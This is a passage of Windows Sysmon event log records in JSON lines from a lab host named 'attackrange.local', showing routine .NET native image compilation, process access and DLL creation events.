{"EventTime":"2020-08-01 08:06:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8035,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:46.084\r\nProcessGuid: {41C8662E-2294-5F25-0000-00106DC30F00}\r\nProcessId: 4500\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1194-0\\System.ServiceModel.Activities.dll\r\nCreationUtcTime: 2020-08-01 08:06:46.084","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:46.084","ProcessGuid":"{41C8662E-2294-5F25-0000-00106DC30F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1194-0\\System.ServiceModel.Activities.dll","CreationUtcTime":"2020-08-01 08:06:46.084","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8036,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:46.147\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2289-5F25-0000-0010B10B0F00}\r\nTargetProcessId: 4588\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:46.147","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2289-5F25-0000-0010B10B0F00}","TargetProcessId":"4588","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8037,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:46.147\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2289-5F25-0000-0010B10B0F00}\r\nTargetProcessId: 4588\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:46.147","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2289-5F25-0000-0010B10B0F00}","TargetProcessId":"4588","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8038,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:46.147\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2289-5F25-0000-0010B10B0F00}\r\nTargetProcessId: 4588\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:46.147","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2289-5F25-0000-0010B10B0F00}","TargetProcessId":"4588","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8039,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:46.209\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2296-5F25-0000-001005D30F00}\r\nTargetProcessId: 820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:46.209","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2296-5F25-0000-001005D30F00}","TargetProcessId":"820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8040,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:46.209\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2296-5F25-0000-001005D30F00}\r\nTargetProcessId: 820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:46.209","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2296-5F25-0000-001005D30F00}","TargetProcessId":"820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8041,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:46.209\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2296-5F25-0000-001005D30F00}\r\nTargetProcessId: 820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:46.209","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2296-5F25-0000-001005D30F00}","TargetProcessId":"820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8042,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:46.568\r\nProcessGuid: {41C8662E-2296-5F25-0000-001005D30F00}\r\nProcessId: 820\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\334-0\\System.ServiceModel.Channels.dll\r\nCreationUtcTime: 2020-08-01 08:06:46.568","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:46.568","ProcessGuid":"{41C8662E-2296-5F25-0000-001005D30F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\334-0\\System.ServiceModel.Channels.dll","CreationUtcTime":"2020-08-01 08:06:46.568","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8043,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:46.600\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2296-5F25-0000-0010B1D90F00}\r\nTargetProcessId: 1340\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:46.600","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2296-5F25-0000-0010B1D90F00}","TargetProcessId":"1340","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a